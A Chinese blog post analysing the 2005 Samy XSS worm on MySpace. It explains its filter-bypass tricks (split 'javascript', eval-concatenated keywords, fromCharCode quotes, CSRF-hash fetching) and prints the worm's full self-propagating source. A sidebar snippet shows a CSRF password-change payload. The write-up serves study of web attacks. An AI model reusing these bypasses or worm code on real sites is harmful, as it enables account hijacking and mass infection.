XSS攻击——SamyWorm 源代码分析

最新推荐文章于 2024-05-02 18:12:22 发布
最新推荐文章于 2024-05-02 18:12:22 发布
阅读量1k 收藏 4
点赞数
分类专栏: 网络安全 文章标签: javascript 安全 xss web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z646683869/article/details/115561856
版权

在2005 年,年仅19 岁的Samy Kamkar 发起了对MySpac巳.com 的XSS Worm 攻击。Samy Kamkar 的蠕虫在短短几小时内就感染了100 万用户一一它在每个用户的自我简介后边加了一句话"but most of all, Samy is my hero." (Samy 是我的偶像〉。这是Web 安全史上第一个重量级的XSS Worm ,具有里程碑意义。

以下为根据对Samy Worm分析的文章进行的格式整理,方便阅读:

  1. MySpace 过滤了很多危险的HTML 标签,只保留了<a>标签、<img>标签、<div>标签等"安全的标签"。所有的事件比如" onclick" 等也被过滤了。但是MySpace 却允许用户控制标签的style 属性,通过style ,还是有办法构造出XSS 的。比如:
<div style-"background:url('javascript:alert(l) ')">
  1. 由于在div标签中,我们已经使用了单引号和双引号,所以我们不能再在语句中使用引号。这使得编写js变得非常困难。为了能绕过它,我们使用了表达式存放js并且使用名字来执行它。例如:
<div id="mycode" expr="alert('hah!')" style="background:url('javascript:eval(document.all.mycode.expr)')">
  1. 现在我们可以使用单引号来写javascript了。然而myspace网中到处都会过滤"javascript"。 由于一些浏览器自动会把"java\nscript"(java和script间是换行符)当作"javascript" ,因此可以饶过这个问题。如:
<div id="mycode" expr="alert('hah!')" style="background:url('java 
script:eval(document.all.mycode.expr)')">
  1. 尽管我们已经能使用单引号了,但有时候我们还是需要双引号。我们可以使用转义字符, 例如, “foo"bar”. Myspace也考虑到了这一点…,他们过滤了所有的引号,不管它是单引号还是双引号。然而, 我们可以通过在javascript转换十进制为来生成引号。
<div id="mycode" expr="alert('double quote: ' + String.fromCharCode(34))" style="background:url('java 
script:eval(document.all.mycode.expr)')">
  1. 为了能把这些代码放到浏览的用户的profile中,我们需要得到这个页面的源码。嗯, 为了取得页面的源码,我们可以使用document.body.innerHTML,只需要取得访问此页面用户的ID即可。 Myspace 又一次考虑到了这些,他们在所有的地方都过滤了"innerHTML"。 为了饶过这个限制,我们使用eval() 把两个字符串拼成"innerHTML"。如:
alert(eval('document.body.inne' + 'rHTML'));
  1. 是时候访问其他页面了。我们可以使用iframes, 然而一般情况下,就算是隐藏的iframes也比较明显,但效果却不尽如人意。 因此,为了在客户端发送HTTP的GET和POST请求,我们使用AJAX (XML-HTTP)。 然而, myspace又过滤了XML-HTTP请求中必须的"onreadystatechange" 。 我们又一次使用eval来避开检查。
eval('xmlhttp.onread' + 'ystatechange = callback');
  1. 是时候在发请求取得用户的关注对象了,我们不想删除任何的关注对象,我们只想把我加到关注的列表中。 如果我们能取得profile就能稍后取得他的关注列表。通过上面列举的内容,我们很容易找到用户的ID.如同我们上面说的那样,我们能通过抓取页面上的源码来取得。然而, 现在我们需要搜索页面中的关键字,但是当我们搜索的时候,一直会返回true,比如说,我们想查页面中有没有包含’foo’,因为我们使用了这个单词,所以一直会返回true,解决的办法就是再用eval来构造,如:
var index = html.indexOf('frien' + 'dID');
  1. 此时我们已经有了关注的列表了。首先,让我们把我通过添加好友的页面中发post讲求,把我加到好友列表中。 什么?没起作用?!为什么呢?(跨域问题) 因为我们在profile.myspace.com页面上,而它需要在www.myspace.com上起作用。没什么大不了的, 只是 XML-HTTP不允许来自不同域的GET/POST。 为了解决这个问题,我们在 www.myspace.com域上使用相同URL就可以了。如:
if (location.hostname == 'profile.myspace.com') document.location = 'http://www.myspace.com' + location.pathname + location.search;
  1. 终于,我们可以发POST请求了。然而,我们发了请求,却没有加为好友,为什么呢?Myspace在每个发post请求的页面中产生了一个随机的hash (例如, “您确认添加此人为好友吗?” 页面). 如果没有在发post请求的时候带上hash,这个post便不会成功. 为了解决这个问题, 我们在发post请求之前,模仿浏览器发一个get请求,并把源文件转成hash,和post请求一起发送。
  2. 一旦post请求完成了,我们添加一个关注者并把代码添加到页面中。由于代码请求完成后,又会回到原来的页面,而发请求又需要不同的hash值,所以我们需要再发一个Get请求,根据之后得到的页面,再生成一次hash,不过,有时候URL-encoding和escape()并不一定能对所有的数据都进行转义,所以我们需要自己手工完成。
  3. 其他的限制,如最大长度,这就需要紧凑的代码,没有多余的空格、模糊的名字、可征用的函数等。

源码

<div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" 
	expr="var B=String.fromCharCode(34);
    var A=String.fromCharCode(39);
    
    function g()
    {
        var C;
        try
        {
            var D=document.body.createTextRange();
            C=D.htmlText
        }
        catch(e){}
        if(C)
        {
            return C
        }
        else
        {
            return eval('document.body.inne'+'rHTML')
        }
    }
    function getData(AU)
    {
        M=getFromURL(AU,'friendID');
        L=getFromURL(AU,'Mytoken')
    }
    function getQueryParams()
    {
        var E=document.location.search;
        var F=E.substring(1,E.length).split('&');
        var AS=new Array();
        for(var O=0;O<F.length;O++)
        {
            var I=F[O].split('=');
            AS[I[0]]=I[1]
        }
        return AS
    }
    var J;
    var AS=getQueryParams();
    var L=AS['Mytoken'];
    var M=AS['friendID'];
    if(location.hostname=='profile.myspace.com')
    {
        document.location='http://www.myspace.com'+location.pathname+location.search
    }
    else
    {
        if(!M)
        {
            getData(g())
        }
        main()
    }
    function getClientFID()
    {
        return findIn(g(),'up_launchIC( '+A,A)
    }
    function nothing() {}
    function paramsToString(AV)
    {
        var N=new String();
        var O=0;
        for(var P in AV)
        {
            if(O>0)
            {
                N+='&'
            }
            var Q=escape(AV[P]);
            while(Q.indexOf('+')!=-1)
            {
                Q=Q.replace('+','%2B')
            }
            while(Q.indexOf('&')!=-1)
            {
                Q=Q.replace('&','%26')
            }
            N+=P+'='+Q;
            O++
        }
        return N
    }
    function httpSend(BH,BI,BJ,BK)
    {
        if(!J)
        {return false}
        eval('J.onr'+'eadystatechange=BI');
        J.open(BJ,BH,true);
        if(BJ=='POST')
        {
            J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
            J.setRequestHeader('Content-Length',BK.length)
        }
        J.send(BK);
        return true
    }
    function findIn(BF,BB,BC)
    {
        var R=BF.indexOf(BB)+BB.length;
        var S=BF.substring(R,R+1024);
        return S.substring(0,S.indexOf(BC))
    }
    function getHiddenParameter(BF,BG)
    {
        return findIn(BF,'name='+B+BG+B+' value='+B,B)
    }
    function getFromURL(BF,BG)
    {    
        var T;
        if(BG=='Mytoken')
        {T=B}
        else
        {T='&'}
        var U=BG+'=';
        var V=BF.indexOf(U)+U.length;
        var W=BF.substring(V,V+1024);
        var X=W.indexOf(T);
        var Y=W.substring(0,X);
        return Y
    }
    function getXMLObj()
    {
        var Z=false;
        if(window.XMLHttpRequest)
        {
            try
            {
                Z=new XMLHttpRequest()
            }
            catch(e)
            {Z=false}
        }
        else if(window.ActiveXObject)
        {
            try{
                Z=new ActiveXObject('Msxml2.XMLHTTP')
            }
            catch(e)
            {
                try
                {
                    Z=new ActiveXObject('Microsoft.XMLHTTP')
                }
                catch(e)
                {
                    Z=false
                }
            }
        }
        return Z
    }
    var AA=g();
    var AB=AA.indexOf('m'+'ycode');
    var AC=AA.substring(AB,AB+4096);
    var AD=AC.indexOf('D'+'IV');
    var AE=AC.substring(0,AD);
    var AF;
    if(AE)
    {
        AE=AE.replace('jav'+'a',A+'jav'+'a');
        AE=AE.replace('exp'+'r)','exp'+'r)'+A);
        AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'
    }
    var AG;
    function getHome()
    {
        if(J.readyState!=4)
        {return}
        var AU=J.responseText;
        AG=findIn(AU,'P'+'rofileHeroes','</td>');
        AG=AG.substring(61,AG.length);
        if(AG.indexOf('samy')==-1)
        {
            if(AF)
            {
                AG+=AF;
                var AR=getFromURL(AU,'Mytoken');
                var AS=new Array();
                AS['interestLabel']='heroes';
                AS['submit']='Preview';
                AS['interest']=AG;
                J=getXMLObj();
                httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))
            }
        }
    }
    function postHero()
    {
        if(J.readyState!=4)
        {return}
        var AU=J.responseText;
        var AR=getFromURL(AU,'Mytoken');
        var AS=new Array();AS['interestLabel']='heroes';
        AS['submit']='Submit';
        AS['interest']=AG;
        AS['hash']=getHiddenParameter(AU,'hash');
        httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))
    }
    function main()
    {
        var AN=getClientFID();
        var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;
        J=getXMLObj();
        httpSend(BH,getHome,'GET');
        xmlhttp2=getXMLObj();
        httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')
    }
    function processxForm()
    {
        if(xmlhttp2.readyState!=4)
        {return}
        var AU=xmlhttp2.responseText;
        var AQ=getHiddenParameter(AU,'hashcode');
        var AR=getFromURL(AU,'Mytoken');
        var AS=new Array();
        AS['hashcode']=AQ;
        AS['friendID']='11851658';
        AS['submit']='Add to Friends';
        httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))
    }
    function httpSend2(BH,BI,BJ,BK)
    {
        if(!xmlhttp2)
        {
        return false}eval('xmlhttp2.onr'+'eadystatechange=BI');
        xmlhttp2.open(BJ,BH,true);
        if(BJ=='POST')
        {
            xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
            xmlhttp2.setRequestHeader('Content-Length',BK.length)
        }
        
        xmlhttp2.send(BK);
        return true
    } "></DIV>
Zttttr
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS漏洞攻击与防护源代码
10-31
XSS漏洞攻击与防护源代码
关于"Samy Worm"技术分析源代码
u013481921的专栏
01-15 1060
说到Web安全和XSS跨站脚本技术,几乎所有的书都会提到Samy Worm,这是在2005年感染了mySpace社交网络上百万用户的蠕虫。正如Morris蠕虫是互联网第一个蠕虫, Samy Worm则是第一个XSS的蠕虫。因此研究XSS技术最好了解一下这个只要浏览了profile就自动把对方加为好友并列为偶像的代码的实现技术。 以下是根据对Samy Worm分析的文章进行的大致翻译: 1)
跨站脚本攻击(XSS)详解
Karka_的博客
01-02 922
XSS(Cross Site Script)攻击,通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。一开始,这种攻击的演示案例是跨域的,所以叫做"跨站脚本"。现在是否跨域已经不再重要,但是名字一直沿用下来。XSS长期以来被列为客户端Web安全中的头号大敌。因为XSS破坏力强大,且产生的场景复杂,难以一次性解决。下面举个XSS的例子php?如果用户提交了一段HTML代码alert(/xss/)就会在页面中执行,弹出框显示/xss/。
新浪微博的XSS攻击
joy
03-26 709
新浪微博的XSS攻击 http://coolshell.cn/articles/4914.html 阅读评论28,159 人阅读     今天晚上(2011年6月28日),新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说
xss漏洞之——XSS蠕虫、DDOS攻击
wsnbbz的博客
03-04 2026
介绍 通过构造的 XSS 代码,通过精心构造的 XSS 代码,可以实现非法转账、篡改信息、删除文章、自我复制等诸多功能。 此处以更改密码为例 代码: <img hidden src='http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Chang...
新浪微博的XSS漏洞攻击过程详解
weixin_34294649的博客
07-11 1378
今天晚上(2011年6月28日),新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建 党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说中的神仙眷侣啊”,“惊爆!范冰冰艳照真流出了”等等 微博和私信,并自动关注一位名为hellosamy的用户。 事件的经过线索如下: 20:14,开始有大量带V...
XSS学习笔记(六)-XSS蠕虫
byteway的专栏
04-28 4780
3.XSS蠕虫 对于XSS蠕虫,无非就是在客户端提交的时候绕过过滤和转义,可以在继续在浏览器端执行的js 等代码,这里提供几种加密方式: 原型:alert(XSS) URL Encode: 大小写(所谓URL编码就是:把所有非字母数字字符都将被替换成百分号(%)后跟两位十六进制数,空格则编码为加号(+)) %3cscript%3ealert('XSS')%3c/script
XSS漏洞学习笔记
lzhy666的博客
07-08 445
通常指黑客通过“HTML注入”纂改了页面,插入了恶意的脚本,从而在用户浏览页面时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,所以叫“跨站脚本”。但是发展到今天,由于Javascript的强大功能以及网站前端应用的复杂化,是否跨域已经不再重要。但是由于历史原因,这个名字保留了下来。假设一个页面把用户输入的参数输出到页面上:1
Web安全漏洞分析-XSS(中)
qq_61861243的博客
11-28 671
2011年6月28日,国内最火的信息发布平台之一一一新浪微博 (http://weibo.com) 遭遇XSS蠕虫攻击,受害者被强迫发布带有攻击链接的私信或微博,内容类似“个税起征点有望提到4000”、“3D肉蒲团高清普通版种子”、“可以监听别人手机的软件”等含有诱惑性的信息。通常情况下,为了防御跨站脚本攻击,会在Web应用中设计一个XSS Filter,即跨站脚本过滤器,用于分析用户提交的输入,并消除潜在的跨站脚本攻击、恶意的HTML或简单的HTML格式错误等。
XSS系列一:什么是XSS攻击
川端小树的博客
10-01 2808
1.关于XSS攻击 XSS全称Cross Site Scripting(跨站脚本),为了与“CSS”区别,就使用XSS作为简称。 XSS攻击指恶意用户在html中注入含恶意的JavaScript代码或者恶意的HTML代码。在其他用户浏览该页面时,浏览器会直接编译处理所有代码包括恶意代码,从而作出损害用户利益的攻击。 下面通过一个简单的前后端数据交互例子进行叙述,先贴上代码 //页面代码 <!DOCTYPE html> <html> <head> <
XSS WORM的分析
Killua
03-27 769
Token的作用1.防止表单重复提交2.用来作身份验证两者在原理上都是通过session token来实现的。当客户端请求页面时,服务器会生成一个随机数Token,并且将Token放置到session当中,然后将Token发给客户端(一般通过构造hidden表单)。下次客户端提交请求时,Token会随着表单一起提交到服务器端。然后,如果应用于“anti csrf攻击”,则服务器端会对Token值进...
XSS攻击 代码演示
05-13
网站xss 攻击 代码示例,包括alert弹框,钓鱼网站截取用户cookie信息等;是学习xss的简单示例。可以下载玩玩看看,示例中的钓鱼网站地址为 演示地址,即本资源中的项目地址。xss也是很简单的,可以学习学习
SpringBoot +esapi 实现防止xss攻击 实战代码
11-25
SpringBoot +esapi springSecurity 过滤器链集成 实现防止xss攻击 实战代码
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
Yii2的XSS攻击防范策略分析
10-21
主要介绍了Yii2的XSS攻击防范策略,较为详细的分析XSS攻击的原理及Yii2相应的防范策略,需要的朋友可以参考下
报表控件Stimulsoft在JavaScript报告工具中的事件:查看器事件(上)
励志做最业余的专业博主,控件产品可以私我~
04-28 863
在本文中,我们为JS报告工具中的查看器事件提供了全面的指南,包括它们的详细描述、参数列表等一系列详细内容。
bpmn-js推荐几款常用的插件
飞云先生
04-30 117
bpmn-js整体框架库的风格是以组件的方式进行实现的,这样的结构也更加便于我们更好的对其进行功能扩展,以及客制化功能实现。其实bpmn.io已经为我们实现了较多场景的组件的实现,了解对应组件的功能更能便于我们区分是否需要自己实现,降低重复造轮子的行为,提高开发效率,本篇文章主要是介绍常见的bpmn-js中使用的组件库。
基于React实现B站评论区
最新发布
stu_kk的博客
05-02 909
使用React构建了一个仿照B站基本的前端评论系统,实现了动态加载、排序、添加和删除评论的基本功能。通过React的状态管理和事件处理机制,实现了交互式的用户体验。但是在实际应用中,还需考虑与后端接口的交互、错误处理、分页加载、以及更复杂的用户交互逻辑。
《ElementUI 基础知识》el-tabs header 监听鼠标中键滚动时左右滑动(ElementPlus同样适用)
前端技术
04-29 976
监听 el-tabs 头在鼠标 hover 时。滑动鼠标中键,可左右滑动!
xss攻击实验的结果和分析
05-26
我很抱歉,作为一个AI语言模型,我并没有能力进行实验或分析,也无法提供关于XSS攻击实验的结果和分析。但是,我可以简单介绍一下XSS攻击XSS(Cross Site Scripting)攻击是一种常见的Web攻击方式,攻击者通过注入恶意脚本代码,使用户在浏览器中运行该脚本,从而可以窃取用户的敏感信息,或者欺骗用户进行一些操作。XSS攻击可以分为存储型、反射型和DOM型三种类型。 为了预防XSS攻击,开发人员可以在前端页面中对用户输入的内容进行过滤和转义,避免恶意脚本代码的注入。同时,后端应用也需要对输入内容进行校验和过滤,防止恶意脚本代码的传递和执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值